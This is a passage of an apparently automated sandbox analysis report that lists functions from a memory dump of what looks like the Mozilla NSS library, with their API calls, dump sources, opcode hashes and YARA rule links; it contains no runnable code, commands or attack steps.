                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e640cbf0f189878edb48ccf96252e20ef2e0bcd64d93d3e8bc1126cb5a33d396
                                                                                                                                                                                                                                                            • Instruction ID: 3395d1161736221b7895cf7145e55c014bf846f19c84114e9e55f31e5fe3976c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e640cbf0f189878edb48ccf96252e20ef2e0bcd64d93d3e8bc1126cb5a33d396
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 521106B7A4010457EA104538AC7677EB109DF92A18F584C78EC16972B3FF1DD6017793
                                                                                                                                                                                                                                                            Function 6BEE98A0 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18821
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF1883D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: EnterCriticalSection.KERNEL32(?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18856
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6BF18887
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_Unlock.NSS3(?,?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18899
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BEE98F5
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32 ref: 6BEE990E
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BEE9942
                                                                                                                                                                                                                                                            • PR_SetError.NSS3 ref: 6BEE995E
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07AD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07CD
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BE4204A), ref: 6BEB07D6
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BE4204A), ref: 6BEB07E4
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,6BE4204A), ref: 6BEB0864
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BEB0880
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsSetValue.KERNEL32(00000000,?,?,6BE4204A), ref: 6BEB08CB
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08D7
                                                                                                                                                                                                                                                              • Part of subcall function 6BEB07A0: TlsGetValue.KERNEL32(?,?,6BE4204A), ref: 6BEB08FB
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalEnterSectionUnlockcalloc$CondErrorWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1779658291-0
                                                                                                                                                                                                                                                            • Opcode ID: 2c42bca90486a242fc059c0c87cd535d429fa2899f872c74c3530c0ab6127f54
                                                                                                                                                                                                                                                            • Instruction ID: da07a24890ebfd718210bbfdce11851006aebf963c69d114f2b6f20a1534b43d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c42bca90486a242fc059c0c87cd535d429fa2899f872c74c3530c0ab6127f54
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C315CB5A046158FDB40EF79C185A2DBBF4FF05318F11446DD8889B311EB39E882CB91
                                                                                                                                                                                                                                                            Function 6BF51A00 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6C022F88,6BF50660), ref: 6BF51A4B
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 6BF51A5F
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(00000080), ref: 6BF51A6F
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3 ref: 6BF51ABF
                                                                                                                                                                                                                                                              • Part of subcall function 6BF54540: TlsGetValue.KERNEL32 ref: 6BF54571
                                                                                                                                                                                                                                                              • Part of subcall function 6BF54540: memset.VCRUNTIME140(?,00000000,00000000), ref: 6BF545B1
                                                                                                                                                                                                                                                              • Part of subcall function 6BF54540: memcpy.VCRUNTIME140(?,?,00000020), ref: 6BF545C2
                                                                                                                                                                                                                                                              • Part of subcall function 6BF54540: PR_Now.NSS3 ref: 6BF54626
                                                                                                                                                                                                                                                              • Part of subcall function 6BF54540: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BF54634
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CallCriticalEnterOnceSectionUnlockUnothrow_t@std@@@__ehfuncinfo$??2@memcpymemset
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1747272319-0
                                                                                                                                                                                                                                                            • Opcode ID: 1f3d2e0a2a5844cbd12e1bc6eb9765e7681b033edfbc10ef19b360c04b990eb9
                                                                                                                                                                                                                                                            • Instruction ID: 169632e2aa24141cdb2942d0a8aa9c321194cdcd027d510ad51110458df15bf5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f3d2e0a2a5844cbd12e1bc6eb9765e7681b033edfbc10ef19b360c04b990eb9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9213A73A041219FD7129F68D844B14F7B8AF62318F1402B5E81487172EB3DF6B0C791
                                                                                                                                                                                                                                                            Function 6BEC69B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(6BEC6AB7,0000000C,00000001,00000000,?,?,6BEC6AB7,?,00000000,?), ref: 6BEC69CE
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(6BEC6AB7,0000001C,00000004,?,00000001,00000000), ref: 6BEC6A06
                                                                                                                                                                                                                                                            • SEC_ASN1EncodeItem_Util.NSS3(6BEC6AB7,?,00000000,?,00000001,00000000,?,?,6BEC6AB7,?,00000000,?), ref: 6BEC6A2D
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6BEC6AB7,?,00000000,?), ref: 6BEC6A42
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4031546487-0
                                                                                                                                                                                                                                                            • Opcode ID: 24772fa637560c62b3d70352af2f712f6ea21148860fd501291bb2edf11805ba
                                                                                                                                                                                                                                                            • Instruction ID: afd3514a333580daece9aae754569fa3c3b1195fe15d3f40456103e2c7d74820
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24772fa637560c62b3d70352af2f712f6ea21148860fd501291bb2edf11805ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F11B6729002016FE710CE69CD81B3773ACEB4075CF20C468EE2DD7311E739E42186A1
                                                                                                                                                                                                                                                            Function 6BFDCB30 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 6BF89890: TlsGetValue.KERNEL32(?,?,?,6BF897EB), ref: 6BF8989E
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(0000001E,?,?,00000000,?,6BF55262,?,?,?,6BF4E333,?,?,6BF4DC77), ref: 6BFDCB47
                                                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(-0000001A,?,6BF55262,?,?,?,6BF4E333,?,?,6BF4DC77), ref: 6BFDCB99
                                                                                                                                                                                                                                                            • _PR_MD_NOTIFYALL_CV.NSS3(?,?,?,6BF55262,?,?,?,6BF4E333,?,?,6BF4DC77), ref: 6BFDCBC3
                                                                                                                                                                                                                                                            • _PR_MD_NOTIFY_CV.NSS3(?,?,?,6BF55262,?,?,?,6BF4E333,?,?,6BF4DC77), ref: 6BFDCBD2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CriticalEnterSectionValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2782078792-0
                                                                                                                                                                                                                                                            • Opcode ID: 14229e09130233ffe4aedd9c18cb111a51edd1b2a55b8daf2b47a4a4466ca482
                                                                                                                                                                                                                                                            • Instruction ID: 62e21e24ed677ff6a2cdbc890a8bd670f1b888fac55e121bea61575ffd4ac930
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14229e09130233ffe4aedd9c18cb111a51edd1b2a55b8daf2b47a4a4466ca482
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5118EB3D00606EBD7008F35D845B46B3B4BF0036AF18866AD81997661EB79E9D1CBE1
                                                                                                                                                                                                                                                            Function 6BECB9F0 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CERT_GetCertTrust.NSS3(?,?), ref: 6BECBA0B
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC9740: TlsGetValue.KERNEL32 ref: 6BEC975A
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC9740: EnterCriticalSection.KERNEL32 ref: 6BEC976F
                                                                                                                                                                                                                                                              • Part of subcall function 6BEC9740: PR_Unlock.NSS3 ref: 6BEC97A7
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010), ref: 6BECBA26
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF210F3
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: EnterCriticalSection.KERNEL32(?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2110C
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21141
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PR_Unlock.NSS3(?,?,?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF21182
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: TlsGetValue.KERNEL32(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2119C
                                                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6BECBA4D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF210C0: PL_ArenaAllocate.NSS3(?,6BEC8802,00000000,00000008,?,6BEBEF74,00000000), ref: 6BF2116E
                                                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BECBA63
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Arena$Value$Alloc_AllocateCriticalEnterSectionUnlockUtil$CertTrustmemcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1891477919-0
                                                                                                                                                                                                                                                            • Opcode ID: 4c5389f7e48073b4ff6fbacd5a6764064c23a69acdc80993e92157f5e6be48a0
                                                                                                                                                                                                                                                            • Instruction ID: 725497d235d2c278e68e1637e19cd4d95c2de282a61ff3f6caa27cdc0d60333e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4c5389f7e48073b4ff6fbacd5a6764064c23a69acdc80993e92157f5e6be48a0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C1154B290021A9FCB00DFB8DC41A6BB7B4FF08258B548565ED2897251E736D525CBA1
                                                                                                                                                                                                                                                            Function 6BF14900 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE09A,00000000,00000004,6BEFC79F,?,?,6BF15C4A,?), ref: 6BF14950
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18821
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: TlsGetValue.KERNEL32(?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF1883D
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: EnterCriticalSection.KERNEL32(?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18856
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6BF18887
                                                                                                                                                                                                                                                              • Part of subcall function 6BF18800: PR_Unlock.NSS3(?,?,?,?,6BF2085A,00000000,?,6BEC8369,?), ref: 6BF18899
                                                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?), ref: 6BF1496A
                                                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF1497A
                                                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF14989
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Value$CriticalEnterSectionUnlock$CondErrorWait
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3904631464-0
                                                                                                                                                                                                                                                            • Opcode ID: db77a8eed90a5b72d4d7ac25e00d801120c20cef1173c342449e2c241a02686a
                                                                                                                                                                                                                                                            • Instruction ID: c50f8872d28cb247f9d475b1e8d47781d73745b0135f75e4ac67676b9a942a7c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: db77a8eed90a5b72d4d7ac25e00d801120c20cef1173c342449e2c241a02686a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB1138B7A082019BEB005F78DD82A1673B8FF4136CF640835ED4987231EB39E8108F91
                                                                                                                                                                                                                                                            Function 6BF59950 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: IdentitiesLayerStrdup_UtilValuefree
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1850533678-0
                                                                                                                                                                                                                                                            • Opcode ID: 5105ce932904e800c499f769c70fc7dbc120747b72bc580e54199181fe621ee8
                                                                                                                                                                                                                                                            • Instruction ID: 3dbf6c766f0992e103a8991fe867eca53407526d46781bbe3ba93b50e1b0591f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5105ce932904e800c499f769c70fc7dbc120747b72bc580e54199181fe621ee8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 201181B36086028BD704AF79C545769FBE4FF55344F018669DC98C7262EF38D4A0CB91
                                                                                                                                                                                                                                                            Function 6BF308D0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(?,?,?,?,?,6BF309B3,0000001A,?), ref: 6BF308E9
                                                                                                                                                                                                                                                              • Part of subcall function 6BF20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BF208B4
                                                                                                                                                                                                                                                            • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6BF308FD
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BF18D2D,?,00000000,?), ref: 6BF1FB85
                                                                                                                                                                                                                                                              • Part of subcall function 6BF1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BF1FBB1
                                                                                                                                                                                                                                                            • SECITEM_AllocItem_Util.NSS3(?,00000000,00000001), ref: 6BF30939
                                                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE013,00000000), ref: 6BF30953
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2511612890.000000006BE41000.00000020.00000001.01000000.00000019.sdmp, Offset: 6BE40000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2511512802.000000006BE40000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512786299.000000006C01E000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2512952713.000000006C01F000.00000008.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513057814.000000006C020000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2513132719.000000006C025000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_6be40000_3m20j.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Util$ErrorItem_$AllocAlloc_ArenaCopyFindTag_memcpy
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2572351645-0
                                                                                                                                                                                                                                                            • Opcode ID: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                                                                                                                                                                            • Instruction ID: b899d92b80365f5dd9233169f4f763dff8f439d2eb38b4a14176736a950385a5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e99b12f1c9af86e3f260138aaee893669f473c170dc6a84dddc8e352a0eca88
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C01B9B7A0671B6BFB149B399C31B2737989F40354F00447AEC1AC6761FBB9E4108AD9
                                                                                                                                                                                                                                                            Function 6BF149C0 Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
